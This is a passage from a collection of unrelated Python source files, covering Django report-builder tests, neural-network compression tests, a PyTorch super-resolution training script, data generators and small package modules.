fields = get_direct_fields_from_model(Report)
names = self.get_fields_names(fields)
self.assertTrue('created' in names)
self.assertTrue('description' in names)
self.assertTrue('distinct' in names)
self.assertTrue('id' in names)
self.assertEquals(len(names), 9)
def test_get_fields(self):
""" Test GetFieldsMixin.get_fields """
obj = GetFieldsMixin()
obj.get_fields(
Bar,
"foos",
)
def test_get_gfk_fields_from_model(self):
fields = get_direct_fields_from_model(Comment)
def test_get_properties_from_model(self):
properties = get_properties_from_model(DisplayField)
self.assertEquals(properties[0]['label'], 'choices')
self.assertEquals(properties[1]['label'], 'choices_dict')
def test_filter_property(self):
# Not a very complete test - only tests one type of filter
result = self.filter_field.filter_property('spam')
self.assertTrue(result)
def test_custom_global_model_manager(self):
""" test for custom global model manager """
if getattr(settings, 'REPORT_BUILDER_MODEL_MANAGER', False):
self.assertEquals(
self.report._get_model_manager(),
settings.REPORT_BUILDER_MODEL_MANAGER)
def test_custom_model_manager(self):
""" test for custom model manager """
if getattr(
self.report.root_model.model_class(),
'report_builder_model_manager',
True
):
# change setup to use actual field and value
self.filter_field.field = 'name'
self.filter_field.filter_value = 'foo'
self.filter_field.save()
# coverage of get_query
objects = self.report.get_query()
# expect custom manager to return correct object with filters
self.assertEquals(objects[0], self.report)
|
498077 | import os
from itertools import product
import auditing_args
from collections import defaultdict
BATCH_SIZE = 50
data_dir = auditing_args.args["save_dir"]
h5s = [fname for fname in os.listdir(data_dir) if fname.endswith('.h5')]
def get_cfg(h5):
splt = h5.split('-')
if 'no' in h5:
return ('no', '.', splt[2], splt[3], splt[4])
else:
return ('new', splt[1], splt[2], splt[3], splt[4])
cfg_map = defaultdict(list)
for h5 in h5s:
cfg_map[get_cfg(h5)].append(h5)
args = {d: len(cfg_map[d]) for d in cfg_map if len(cfg_map[d]) > 0}
print(args)
all_exp = []
def run_exp(cmd):
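    # Prefix with an empty CUDA_VISIBLE_DEVICES so the spawned job sees no GPUs
    # and runs on CPU (the pool below launches 16 of these in parallel)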
cmd = "CUDA_VISIBLE_DEVICES= "+cmd
print(cmd)
os.system(cmd)
fmt_cmd = "python make_nps.py {} {} {} {} {} {} {}"
for arg in args:
for start in range(0, args[arg], BATCH_SIZE):
cmd = fmt_cmd.format(arg[0], start, start + BATCH_SIZE, arg[1], arg[2], arg[3], arg[4])
all_exp.append(cmd)
print(len(args), len(all_exp))
import multiprocessing as mp
p = mp.Pool(16)
p.map(run_exp, all_exp)
|
498095 | from .conv import conv_layer, norm_layer, ConvModule
from .nms import multiclass_nms
from .anchor_generator import AnchorGenerator
from .bbox import delta2bbox, bbox2result
__all__ = ['conv_layer', 'norm_layer', 'ConvModule', 'nms', 'AnchorGenerator', 'delta2bbox', 'multiclass_nms', 'bbox2result']
|
498111 | from .bitmovin_error import BitmovinError
from .bitmovin_api_error import BitmovinApiError
from .invalid_status_error import InvalidStatusError
from .invalid_type_error import InvalidTypeError
from .unique_constraint_violation_error import UniqueConstraintViolationException
from .missing_argument_error import MissingArgumentError
from .functionality_not_available_error import FunctionalityNotAvailableError
from .timeout_error import TimeoutError
|
498117 | import torch
import gym
import numpy as np
from .utils import make_tensor
class TorchModel(torch.nn.Module):
"""Base class for all pytorch models"""
def __init__(self, observation_space):
"""Initializes the model with the given observation space
Currently supported observation spaces are:
- Box spaces
- A tuple of box spaces, where the 1st one is the 'main' observation,
and the rest contain additional 1D vectors of linear features for
the model which are fed to one of the non-convolutional layers
(Usually the RNN layer)
"""
super().__init__()
        # When using multiple actors, each with its own CPU copy of the model,
        # we need to limit them to be single-threaded, otherwise they slow each
        # other down. This should not affect training time if training is on
        # the GPU.
torch.set_num_threads(1)
self._setup_inputs(observation_space)
def _setup_inputs(self, obs_space):
"""Sets up the input sizes based on the given observation space"""
assert(isinstance(obs_space, (gym.spaces.Box, gym.spaces.Tuple))), \
"TorchModel currently only supports Box or Tuple as the " \
"observation space"
if isinstance(obs_space, gym.spaces.Box):
# Basic case of just a single box space, no extra input features
self.main_input_shape = obs_space.shape
self.extra_input_shape = None
else:
# For now we just support the basic case where all spaces are Box
# (i.e. no nested tuple spaces), and only the 1st space is the main
# space, while the rest of the spaces are 1D extra feature vectors
assert(np.all([
isinstance(space, gym.spaces.Box)
for space in obs_space.spaces])), \
"TorchModel only supports tuples of boxes as the observation "\
"space"
# TODO: Support multiple main spaces and nested tuples??
assert(np.all(
[len(space.shape) == 1 for space in obs_space.spaces[1:]])), \
"TorchModel currently only supports 1D box spaces for the " \
" non-main observation space"
self.main_input_shape = obs_space.spaces[0].shape
self.extra_input_shape = (
np.sum([space.shape for space in obs_space.spaces[1:]]),)
def _get_inputs(self, inp):
"""Returns the the input separated into the 'main input' and the
'extra inputs' (If applicable, i.e. if it's a tuple observation space)
"""
if not isinstance(inp, tuple):
return (inp, None)
else:
return (inp[0], torch.cat(inp[1:], dim=-1))
def is_recurrent(self):
raise NotImplementedError
def set_layer_preprocessor(self, layer_index, preprocessor):
raise NotImplementedError
|
498136 | from ..qemu_config import QemuArchParams
QEMU_ARCH = QemuArchParams(linux_arch='x86_64',
kconfig='''
CONFIG_SERIAL_8250=y
CONFIG_SERIAL_8250_CONSOLE=y''',
qemu_arch='x86_64',
kernel_path='arch/x86/boot/bzImage',
kernel_command_line='console=ttyS0',
extra_qemu_params=[''])
|
498162 | from abc import ABC
from pathlib import Path
from typing import Dict
import pytest
from torch import nn
from nncf import NNCFConfig
from nncf.common.quantization.structs import QuantizerConfig
from nncf.torch.quantization.algo import QuantizationController
from tests.common.helpers import TEST_ROOT
from tests.torch.sample_test_validator import SampleType
from tests.torch.sample_test_validator import SanitySampleValidator
from tests.torch.sample_test_validator import SanityTestCaseDescriptor
class PrecisionTestCaseDescriptor(SanityTestCaseDescriptor, ABC):
def __init__(self):
super().__init__()
self.num_weight_quantizers_: int = 0
self.num_activation_quantizers_: int = 0
@property
def config_directory(self) -> Path:
return TEST_ROOT.joinpath("torch", "data", "configs", "hawq")
def get_precision_section(self) -> Dict:
raise NotImplementedError
def get_compression_section(self):
quantization_section = {
'algorithm': 'quantization',
'initializer': {
'precision': self.get_precision_section(),
'range': {
"num_init_samples": 2
},
"batchnorm_adaptation": {
"num_bn_adaptation_samples": 1
}
},
}
if self.sample_type_ == SampleType.CLASSIFICATION_STAGED:
quantization_section.update({'params': {"activations_quant_start_epoch": 0}})
return quantization_section
def num_weight_quantizers(self, n: int):
self.num_weight_quantizers_ = n
return self
def num_activation_quantizers(self, n: int):
self.num_activation_quantizers_ = n
return self
class PrecisionSampleValidator(SanitySampleValidator):
def __init__(self, desc: PrecisionTestCaseDescriptor):
super().__init__(desc)
self._train_mock = None
def setup_spy(self, mocker):
train_location = self._sample_handler.get_train_location()
self._train_mock = mocker.patch(train_location)
        # Need to mock SafeMLFLow to prevent an mlflow session from being started
        # and left unclosed (a memory leak of the config and SafeMLFLow objects
        # that happens when the train function is mocked)
self._sample_handler.mock_mlflow(mocker)
def validate_spy(self):
self._train_mock.assert_called_once()
class HAWQTestCaseDescriptor(PrecisionTestCaseDescriptor):
def __init__(self):
super().__init__()
self.batch_size_init_: int = 0
def get_validator(self):
return HAWQSampleValidator(self)
def batch_size_init(self, batch_size_init: int):
self.batch_size_init_ = batch_size_init
return self
def get_sample_params(self):
result = super().get_sample_params()
result.update({'batch_size_init': self.batch_size_init_} if self.batch_size_init_ else {})
return result
def get_precision_section(self) -> Dict:
return {"type": "hawq",
"num_data_points": 3,
"iter_number": 1}
def __str__(self):
bs = f'_bs{self.batch_size_init_}' if self.batch_size_init_ else ''
return super().__str__() + '_hawq' + bs
class HAWQSampleValidator(PrecisionSampleValidator):
def __init__(self, desc: HAWQTestCaseDescriptor):
super().__init__(desc)
self._desc = desc
self.get_qsetup_spy = None
self.hessian_trace_estimator_spy = None
def setup_spy(self, mocker):
super().setup_spy(mocker)
from nncf.torch.quantization.init_precision import HAWQPrecisionInitializer
self.get_qsetup_spy = mocker.spy(HAWQPrecisionInitializer, "get_quantizer_setup_for_qconfig_sequence")
from nncf.torch.quantization.hessian_trace import HessianTraceEstimator
self.hessian_trace_estimator_spy = mocker.spy(HessianTraceEstimator, "__init__")
def validate_spy(self):
super().validate_spy()
qconfig_sequence = self.get_qsetup_spy.call_args[0][1]
assert len(qconfig_sequence) == self._desc.num_weight_quantizers_
all_precisions = {qc.num_bits for qc in qconfig_sequence}
# with default compression ratio = 1.5 all precisions should be different from the default one
assert all_precisions != {QuantizerConfig().num_bits}
init_data_loader = self.hessian_trace_estimator_spy.call_args[0][5]
expected_batch_size = self._desc.batch_size_init_ if self._desc.batch_size_init_ else self._desc.batch_size_
assert init_data_loader.batch_size == expected_batch_size
class AutoQTestCaseDescriptor(PrecisionTestCaseDescriptor):
def __init__(self):
super().__init__()
self.subset_ratio_: float = 1.0
self.BITS = [2, 4, 8]
self.debug_dump: bool = False
def get_validator(self):
return AutoQSampleValidator(self)
def subset_ratio(self, subset_ratio_: float):
self.subset_ratio_ = subset_ratio_
return self
def dump_debug(self, debug_dump: bool):
self.debug_dump = debug_dump
return self
def get_precision_section(self) -> Dict:
return {"type": "autoq",
"bits": self.BITS,
"iter_number": 2,
"compression_ratio": 0.15,
"eval_subset_ratio": self.subset_ratio_,
"dump_init_precision_data": self.debug_dump}
def __str__(self):
sr = f'_sr{self.subset_ratio_}' if self.subset_ratio_ else ''
dd = '_dump_debug' if self.debug_dump else ''
return super().__str__() + '_autoq' + sr + dd
class AutoQSampleValidator(PrecisionSampleValidator):
def __init__(self, desc: AutoQTestCaseDescriptor):
super().__init__(desc)
self._desc = desc
self.builder_spy = None
def setup_spy(self, mocker):
super().setup_spy(mocker)
from nncf.torch.quantization.algo import QuantizationBuilder
self.builder_spy = mocker.spy(QuantizationBuilder, 'build_controller')
def validate_spy(self):
super().validate_spy()
ctrl = self.builder_spy.spy_return
final_bits = [qm.num_bits for qm in ctrl.all_quantizations.values()]
assert set(final_bits) != {QuantizerConfig().num_bits}
assert all(bit in self._desc.BITS for bit in final_bits)
def resnet18_desc(x: PrecisionTestCaseDescriptor):
return x.config_name("resnet18_cifar10_mixed_int.json").sample_type(SampleType.CLASSIFICATION). \
mock_dataset('mock_32x32').batch_size(3).num_weight_quantizers(21).num_activation_quantizers(27)
def inception_v3_desc(x: PrecisionTestCaseDescriptor):
return x.config_name("inception_v3_cifar10_mixed_int.json").sample_type(SampleType.CLASSIFICATION). \
mock_dataset('mock_32x32').batch_size(3).num_weight_quantizers(95).num_activation_quantizers(105)
def ssd300_vgg_desc(x: PrecisionTestCaseDescriptor):
return x.config_name("ssd300_vgg_voc_mixed_int.json").sample_type(SampleType.OBJECT_DETECTION). \
mock_dataset('voc').batch_size(3).num_weight_quantizers(35).num_activation_quantizers(27)
def unet_desc(x: PrecisionTestCaseDescriptor):
return x.config_name("unet_camvid_mixed_int.json").sample_type(SampleType.SEMANTIC_SEGMENTATION). \
mock_dataset('camvid').batch_size(3).num_weight_quantizers(23).num_activation_quantizers(23)
def icnet_desc(x: PrecisionTestCaseDescriptor):
return x.config_name("icnet_camvid_mixed_int.json").sample_type(SampleType.SEMANTIC_SEGMENTATION). \
mock_dataset('camvid').batch_size(3).num_weight_quantizers(64).num_activation_quantizers(81)
TEST_CASE_DESCRIPTORS = [
inception_v3_desc(HAWQTestCaseDescriptor()),
inception_v3_desc(HAWQTestCaseDescriptor()).sample_type(SampleType.CLASSIFICATION_STAGED),
resnet18_desc(HAWQTestCaseDescriptor()),
resnet18_desc(HAWQTestCaseDescriptor()).sample_type(SampleType.CLASSIFICATION_STAGED),
resnet18_desc(HAWQTestCaseDescriptor().batch_size_init(2)),
resnet18_desc(HAWQTestCaseDescriptor().batch_size_init(2)).sample_type(SampleType.CLASSIFICATION_STAGED),
ssd300_vgg_desc(HAWQTestCaseDescriptor()),
ssd300_vgg_desc(HAWQTestCaseDescriptor().batch_size_init(2)),
unet_desc(HAWQTestCaseDescriptor()),
unet_desc(HAWQTestCaseDescriptor().batch_size_init(2)),
icnet_desc(HAWQTestCaseDescriptor()),
inception_v3_desc(AutoQTestCaseDescriptor()).batch_size(2),
inception_v3_desc(AutoQTestCaseDescriptor()).sample_type(SampleType.CLASSIFICATION_STAGED),
resnet18_desc(AutoQTestCaseDescriptor()).batch_size(2),
resnet18_desc(AutoQTestCaseDescriptor().dump_debug(True)).batch_size(2).sample_type(
SampleType.CLASSIFICATION_STAGED),
resnet18_desc(AutoQTestCaseDescriptor().subset_ratio(0.2)).batch_size(2),
resnet18_desc(AutoQTestCaseDescriptor().subset_ratio(0.2)).sample_type(SampleType.CLASSIFICATION_STAGED),
ssd300_vgg_desc(AutoQTestCaseDescriptor().dump_debug(True)).batch_size(2),
unet_desc(AutoQTestCaseDescriptor().dump_debug(True)),
icnet_desc(AutoQTestCaseDescriptor())
]
@pytest.fixture(name='precision_desc', params=TEST_CASE_DESCRIPTORS, ids=map(str, TEST_CASE_DESCRIPTORS))
def fixture_precision_desc(request, dataset_dir):
desc: PrecisionTestCaseDescriptor = request.param
return desc.finalize(dataset_dir)
def test_precision_init(precision_desc: PrecisionTestCaseDescriptor, tmp_path, mocker):
validator = precision_desc.get_validator()
args = validator.get_default_args(tmp_path)
validator.validate_sample(args, mocker)
class ExportTestCaseDescriptor(PrecisionTestCaseDescriptor):
def get_validator(self):
return ExportSampleValidator(self)
def get_precision_section(self) -> Dict:
return {}
def get_sample_params(self):
result = super().get_sample_params()
result.update({'pretrained': True})
return result
class ExportSampleValidator(PrecisionSampleValidator):
def __init__(self, desc: ExportTestCaseDescriptor):
super().__init__(desc)
self._desc = desc
self.is_export_called = False
self._ctrl_mock = None
self._reg_init_args_patch = None
self._create_compressed_model_patch = None
def setup_spy(self, mocker):
super().setup_spy(mocker)
self._reg_init_args_patch = mocker.spy(NNCFConfig, "register_extra_structs")
sample_location = self._sample_handler.get_sample_location()
if self._desc.sample_type_ == SampleType.OBJECT_DETECTION:
mocker.patch(sample_location + '.build_ssd')
else:
load_model_location = sample_location + '.load_model'
mocker.patch(load_model_location)
ctrl_mock = mocker.MagicMock(spec=QuantizationController)
model_mock = mocker.MagicMock(spec=nn.Module)
create_model_location = sample_location + '.create_compressed_model'
create_model_patch = mocker.patch(create_model_location)
if self._desc.sample_type_ == SampleType.CLASSIFICATION_STAGED:
mocker.patch(sample_location + '.get_quantization_optimizer')
def fn(*args, **kwargs):
return ctrl_mock, model_mock
create_model_patch.side_effect = fn
self._ctrl_mock = ctrl_mock
def validate_spy(self):
super().validate_spy()
self._reg_init_args_patch.assert_called()
if self.is_export_called:
self._ctrl_mock.export_model.assert_called_once()
else:
self._ctrl_mock.export_model.assert_not_called()
EXPORT_TEST_CASE_DESCRIPTORS = [
resnet18_desc(ExportTestCaseDescriptor()),
resnet18_desc(ExportTestCaseDescriptor()).sample_type(SampleType.CLASSIFICATION_STAGED),
ssd300_vgg_desc(ExportTestCaseDescriptor()),
unet_desc(ExportTestCaseDescriptor()),
]
@pytest.fixture(name='export_desc', params=EXPORT_TEST_CASE_DESCRIPTORS, ids=map(str, EXPORT_TEST_CASE_DESCRIPTORS))
def fixture_export_desc(request):
desc: PrecisionTestCaseDescriptor = request.param
return desc.finalize()
@pytest.mark.parametrize(
('extra_args', 'is_export_called'),
(
({}, False),
({"-m": 'export train'}, True)
),
ids=['train_with_onnx_path', 'export_after_train']
)
def test_export_behavior(export_desc: PrecisionTestCaseDescriptor, tmp_path, mocker, extra_args, is_export_called):
validator = export_desc.get_validator()
args = validator.get_default_args(tmp_path)
args["--to-onnx"] = tmp_path / 'model.onnx'
if extra_args is not None:
args.update(extra_args)
validator.is_export_called = is_export_called
validator.validate_sample(args, mocker)
|
498197 | from plenum.common.constants import DOMAIN_LEDGER_ID
from plenum.server.batch_handlers.batch_request_handler import BatchRequestHandler
from plenum.server.database_manager import DatabaseManager
from plenum.test.plugin.demo_plugin import AUCTION_LEDGER_ID
class AuctionBatchHandler(BatchRequestHandler):
def __init__(self, database_manager: DatabaseManager):
super().__init__(database_manager, AUCTION_LEDGER_ID)
def post_batch_applied(self, three_pc_batch, prev_handler_result=None):
pass
def post_batch_rejected(self, ledger_id, prev_handler_result=None):
pass
|
498213 | import logging
import numpy
import numpy as np  # imported directly rather than via keras.layers
from keras.utils import Sequence
import utils
import utils_logging
from utils import IMAGE_HEIGHT, IMAGE_WIDTH, IMAGE_CHANNELS
FRAME_INTERVAL = 15
logger = logging.Logger("LstmImgBatchGenerator")
utils_logging.log_info(logger)
class LstmImgBatchGenerator(Sequence):
def __init__(self, x_paths_to_pictures, y_paths_to_pictures, data_dir: str, sequence_length: int, gray_scale: bool):
self.data_dir = data_dir
logger.warning("Using hard-coded batch size in lstm img batch generator")
self.batch_size = 4
self.x_paths_to_pictures = x_paths_to_pictures
self.y_paths_to_pictures = y_paths_to_pictures
self.sequence_length = sequence_length
self.gray_scale= gray_scale
def __getitem__(self, index):
start_index = index * self.batch_size
end_index = start_index + self.batch_size
this_batch_x_paths = self.x_paths_to_pictures[start_index:end_index]
this_batch_y_paths = self.y_paths_to_pictures[start_index:end_index]
assert this_batch_x_paths.size == this_batch_y_paths.size
assert this_batch_x_paths[0][1] == this_batch_y_paths[0][0]
x_images = self.empty_batch_array(this_batch_x_paths)
for i, paths in enumerate(this_batch_x_paths):
x = self.load_paths_to_images(paths=paths)
x_images[i] = x
y_images = self.empty_batch_array(this_batch_y_paths)
for i, paths in enumerate(this_batch_y_paths):
x = x_images[i]
x_sublist = x[1:]
last_y = paths[len(paths)-1]
last_img = self.load_paths_to_images(numpy.asarray([last_y]))
y = numpy.concatenate((x_sublist, last_img))
assert len(x) == len(y)
y_images[i] = y
assert numpy.array_equal(x_images[0][1], y_images[0][0])
return x_images, y_images
def empty_batch_array(self, this_batch_y_paths):
return np.empty([len(this_batch_y_paths), self.sequence_length, IMAGE_HEIGHT, IMAGE_WIDTH, IMAGE_CHANNELS])
def load_paths_to_images(self, paths):
images = np.empty([len(paths), IMAGE_HEIGHT, IMAGE_WIDTH, IMAGE_CHANNELS])
for k, path in enumerate(paths):
images[k] = utils.load_img_from_path(data_dir=self.data_dir,
image_name=path,
is_gray_scale=self.gray_scale)
return images
def get_single_sequence(self, index):
x = self.x_paths_to_pictures[index]
x_imgs = []
x_imgs.append(self.load_paths_to_images(x))
x_imgs = numpy.array(x_imgs)
# Low performance implementation, but this is not relevant as we're only using the method for manual check
y = self.y_paths_to_pictures[index]
y_imgs = self.load_paths_to_images(y)
assert len(y_imgs) == self.sequence_length
next_image = y_imgs[self.sequence_length - 1]
return x_imgs, next_image
def __len__(self):
return (len(self.x_paths_to_pictures ) - FRAME_INTERVAL)// self.batch_size
def get_batch_size(self):
return self.batch_size
|
498255 | from __future__ import print_function
import os
import time
from datetime import datetime
import math
import argparse
import logging
import pickle
import yaml
import cv2 as cv
import numpy as np
# from skimage.measure.simple_metrics import compare_psnr
import torch
import torch.nn as nn
import torch.optim as optim
import torch.backends.cudnn as cudnn
from torch.utils.data import DataLoader
from torch.utils.tensorboard import SummaryWriter
from data.youku import SISRDataset
from model.WDSR_A import MODEL
from models.modules.RRDBNet_arch import RRDBNet
# Training settings
parser = argparse.ArgumentParser(description='PyTorch Super Res Example')
parser.add_argument('--yaml_path', type=str, default="./settings.yaml", help='path to the configuration file')
args = parser.parse_args()
with open(args.yaml_path, 'r') as yf:
    opt = yaml.safe_load(yf)
cudnn.benchmark = True
cuda = opt['hardware']['cuda']
logger = logging.getLogger('base')
print(opt)
if cuda and not torch.cuda.is_available():
raise Exception("No GPU found, please run without --cuda")
torch.manual_seed(opt['hardware']['seed'])
if cuda:
torch.cuda.manual_seed(opt['hardware']['seed'])
device = torch.device("cuda" if cuda else "cpu")
now = datetime.now()
label = f"{opt['model']}-C{opt['channel']}-R{opt[opt['model']]['n_resblocks']}F{opt[opt['model']]['n_feats']}"
tb_dir = f"{opt['log_dir']}/{now.strftime('%m%d-%H%M-')}{label}/"
print('===> Loading dataset')
train_set = SISRDataset(data_dir=opt['data_dir'], augment=opt['augment'],
patch_size=opt['patch_size'], v_freq=opt['vFreq'],
preload=opt['preload'], norm=False)
data_loader = DataLoader(dataset=train_set, num_workers=opt['hardware']['threads'],
batch_size=opt['batch_size'], shuffle=True)
eval_set = SISRDataset(data_dir=opt['eval_dir'], augment=opt['augment'],
patch_size=0, v_freq=5)
eval_loader = DataLoader(dataset=eval_set, num_workers=opt['hardware']['threads'],
shuffle=True)
print('===> Building model')
if opt['model'] == 'WDSR':
if opt['channel'] == 3:
model = MODEL(cuda, n_res=opt['WDSR']['n_resblocks'], n_feats=opt['WDSR']['n_feats'],
res_scale=opt['WDSR']['res_scale'], n_colors=3, block_feats=opt['WDSR']['block_feats'],
mean=opt['mean']).to(device)
else:
model = MODEL(cuda, n_res=opt['WDSR']['n_resblocks'], n_feats=opt['WDSR']['n_feats'],
res_scale=opt['WDSR']['res_scale'],
n_colors=1, mean=[opt['mean'][opt['channel']]]).to(device)
elif opt['model'] == 'RRDB':
model = RRDBNet(3, 3, opt['RRDB']['n_feats'], opt['RRDB']['n_resblocks']).to(device)
else:
model = None
criterion = nn.L1Loss().to(device)
optimizer = optim.Adam(model.parameters(), lr=opt['lr'])
# optimizer = Nadam(model.parameters(), lr=0.00001)
# optimizer = optim.SGD(model.parameters(), lr=opt['lr'], momentum=0.9, weight_decay=1e-4, nesterov=True)
re_avgpool = torch.nn.AvgPool2d((2, 2), stride=(2, 2))
if opt['pre_trained'] and os.path.exists(opt['pre_train_path']):
model.load_state_dict(torch.load(opt['pre_train_path'], map_location=lambda storage, loc: storage))
# with open(f"{opt['save_dir']}/optim.pkl", 'rb') as f:
# optimizer = pickle.load(f)
print('Pre-trained SR model is loaded.')
def get_ch(img: torch.Tensor, channel: int):
    if channel == 0:  # Y channel
        return img.index_select(1, torch.LongTensor([channel])).to(device)
    elif 3 > channel > 0:  # U and V channels (downsampled by 2x2 average pooling)
        return re_avgpool(img.index_select(1, torch.LongTensor([channel]))).to(device)
    elif channel == 3:  # 4:4:4 (all three channels)
return img.to(device)
def out_rgb(img, path):
img = img.cpu().squeeze(0).numpy().astype(np.uint8).transpose((1,2,0))
if opt['channel'] < 3:
img = img[0]
elif opt['rgb'] == False:
img = cv.cvtColor(img, cv.COLOR_YUV2RGB)
cv.imwrite(path, img)
return
def train(e):
print(f"===> Epoch {e} Begin: LR: {optimizer.param_groups[0]['lr']}")
epoch_loss = 0
model.train()
for batch_i, batch in enumerate(data_loader):
t0 = time.time()
lr, gt = get_ch(batch[0], opt['channel']), get_ch(batch[1], opt['channel'])
optimizer.zero_grad()
loss = criterion(model(lr), gt)
epoch_loss += loss.item()
loss.backward()
optimizer.step()
t1 = time.time()
        # log a point for the loss curve every 10 batches
if batch_i % 10 == 0:
print(f"===> Epoch[{e}]({batch_i}/{len(data_loader)}):",
f" Loss: {loss.item():.4f} || Timer: {(t1 - t0):.4f} sec.")
            niter = (e * len(data_loader) + batch_i) * opt['batch_size']
with SummaryWriter(log_dir=tb_dir, comment='WDSR')as w:
w.add_scalar('Train/Loss', loss.item(), niter)
avg_loss = epoch_loss / len(data_loader)
with SummaryWriter(log_dir=tb_dir, comment='WDSR')as w:
w.add_scalar('Train/lr', optimizer.param_groups[0]['lr'], e)
w.add_scalar('Train/epoch_Loss', avg_loss, e)
print(f"===> Epoch {e} Complete: Avg. Loss: {avg_loss:.4f}")
return
def eval_func(e, only=False):
epoch_loss = 0
avg_psnr = 0
if opt['pre_trained'] and only:
model.load_state_dict(torch.load(opt['pre_train_path']))
model.eval()
for batch_i, batch in enumerate(eval_loader):
t0 = time.time()
lr, gt = get_ch(batch[0], opt['channel']).to(device), get_ch(batch[1], opt['channel']).to(device)
with torch.no_grad():
sr = model(lr)
_psnr = psnr_tensor(sr, gt)
loss = criterion(sr, gt)
t1 = time.time()
epoch_loss += loss.item()
avg_psnr += _psnr
if batch_i % 20 == 0:
out_rgb(lr, f"/data/evi/{opt['channel']}_{e}_{batch_i}_lr.png")
out_rgb(sr, f"/data/evi/{opt['channel']}_{e}_{batch_i}_sr.png")
out_rgb(gt, f"/data/evi/{opt['channel']}_{e}_{batch_i}_gt.png")
print(f"===> eval({batch_i}/{len(eval_loader)}): PSNR: {_psnr:.4f}",
f" Loss: {loss.item():.4f} || Timer: {(t1 - t0):.4f} sec.")
avg_psnr /= len(eval_loader)
avg_loss = epoch_loss / len(eval_loader)
print(f"===> eval Complete: Avg PSNR: {avg_psnr}, Avg. Loss: {avg_loss:.4f}")
with SummaryWriter(log_dir=tb_dir, comment='WDSR')as w:
        w.add_scalar('eval/PSNR', avg_psnr, e)
        w.add_scalar('eval/LOSS', avg_loss, e)
return avg_psnr
def psnr_tensor(img1: torch.Tensor, img2: torch.Tensor):
    # img1 and img2 have range [0, 255]; the squared peak value is 255 ** 2 = 65025
diff = img1 - img2
mse = torch.mean(diff * diff).item()
if mse == 0:
return float('inf')
return 10 * math.log10(65025.0 / mse)
def checkpoint(comment=""):
global opt
save_path = f"{opt['save_dir']}/{opt['scale']}x_{comment}_{epoch}.pth"
torch.save(model.state_dict(), save_path)
with open(args.yaml_path, 'r') as f:
        opt = yaml.safe_load(f)
opt['pre_train_path'] = save_path
opt['pre_trained'] = True
opt['startEpoch'] = epoch + 1
# with open(f"{opt['save_dir']}/optim.pkl", 'wb') as f:
# pickle.dump(optimizer, f)
with open(args.yaml_path, 'w') as f:
f.write(yaml.dump(opt))
print(f"Checkpoint saved to {save_path}")
doEval = opt['only_eval']
if doEval:
eval_func(-1, opt['only_eval'])
else:
for epoch in range(opt['startEpoch'], opt['nEpochs'] + 1):
train(epoch)
if (epoch + 1) % opt['snapshots'] == 0:
checkpoint(label)
eval_func(epoch)
if (epoch + 1) in opt['lr_step']:
for param_group in optimizer.param_groups:
param_group['lr'] /= 10.0
# persist the configuration when the script exits
with open(args.yaml_path, 'w') as yf:
yf.write(yaml.dump(opt))
os.system("bash /root/shutdown.sh")
"""
需要调节的:
- n_resblocks = 16
- n_feats = 64
- 三个通道均值 mean 从数据中来
- lr 的更新
- batch size
- patch size
- v freq 每个视频每epoch抽帧次数
"""
|
498269 | class GuetError(Exception):
pass
class InvalidInitialsError(GuetError):
pass
class UnexpectedError(GuetError):
pass
|
498300 | from anyapi import AnyAPI
from anyapi.utils import retry
from requests.exceptions import MissingSchema
import pytest
def test_retry():
"""Test retry utility"""
    # Ideally `retry` and `retry_until` would be tested separately,
    # but no clean way to exercise `retry_until` in isolation was found
try:
invalid_api = AnyAPI("invalidurl", scoped_calls=[retry(2)])
invalid_api.GET()
except MissingSchema:
assert True
else:
assert False
|
498317 | import re
import os
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.cm as cm #color map
import getpass
import seaborn as sns
from scipy.stats import spearmanr, pearsonr, sem
import itertools
import matplotlib.ticker as ticker
# import statsmodels.api as sm
def main():
BuildingList = ['05_MaletPlaceEngineering', '01_CentralHouse', '02_BuroHappold_17', '03_BuroHappold_71'] # Location of DATA
BuildingHardDisk = ['05_MaletPlaceEngineering_Project', '01_CentralHouse_Project', '02_BuroHappold_17','03_BuroHappold_71']
DataFilePaths = ['MPEB', 'CentralHouse', '17', '71'] # Location of STM data and file naming
BuildingLabels = ['MPEB', 'CH', 'Office 17', 'Office 71']
BuildingAbbreviations = ['MPEB', 'CH', '17', '71', 'Nothing']
InputVariables = ['inputs_MaletPlace_FINAL.csv', 'inputs_CentralHouse_222_29_11_15_02_2870.csv', 'Inputs.csv', 'inputs_BH71_27_09_13_46.csv']
FloorAreas = [9579, 5876, 1924, 1691]
NO_ITERATIONS = [3000, 2870, 100, 100]
building_num = 1 # 0 = MPEB, 1 = CH, 2 = 17, 3 = 71
time_step = 'year' # month or year
building_abr = BuildingAbbreviations[building_num]
datafile = DataFilePaths[building_num]
building_label = BuildingLabels[building_num]
floor_area = FloorAreas[building_num]
building_harddisk = BuildingHardDisk[building_num]
NO_ITERATIONS = NO_ITERATIONS[building_num]
inputs = InputVariables[building_num]
parallel_runs_harddisk = start_path + 'OneDrive - BuroHappold\EngD_hardrive backup/UCL_DemandLogic/' + building_harddisk + '/ParallelSimulation/Eplusmtr/'
DataPath_model_real = start_path + 'OneDrive - BuroHappold\EngD_hardrive backup/UCL_DemandLogic/' + building_harddisk + '/ParallelSimulation/'
DataPathImages = start_path + 'OneDrive - BuroHappold/01 - EngD/01 - Thesis/02_Images/'
to_hdf = False
if to_hdf:
runs_outputs = readRuns(parallel_runs_harddisk, time_step=time_step, NO_ITERATIONS=NO_ITERATIONS)
print(runs_outputs.head())
runs_outputs.to_hdf(DataPath_model_real + building_abr+ '_' + str(NO_ITERATIONS) +'_RUNS_' + time_step + '.hdf', 'runs', mode='w')
runs_outputs = pd.read_hdf(DataPath_model_real + building_abr+ '_' + str(NO_ITERATIONS) +'_RUNS_' + time_step + '.hdf', 'runs')
Y_real = runs_outputs.as_matrix()
cols_outputs = runs_outputs.columns.tolist()
runs_inputs = readInputs(DataPath_model_real, parallel_runs_harddisk, inputs, NO_ITERATIONS)
X_real = runs_inputs.as_matrix()
cols_inputs = runs_inputs.columns.tolist()
# X_real_data = np.vstack((cols_inputs, X_real))
# Y_real_data = np.vstack((cols_outputs, Y_real))
#input_outputs = np.hstack((X_real_data, Y_real_data))
#pd.DataFrame(input_outputs).to_csv(DataPath_model_real + 'input_outputs_' + time_step + '.csv', header=None)
df_corr_stnd, df_corr_spearman, df_corr_pearson = calculateCorrelations(DataPath_model_real, X_real, Y_real, cols_outputs, cols_inputs)
#heatmapCorrelations(df_corr_pearson, runs_outputs, DataPathImages)
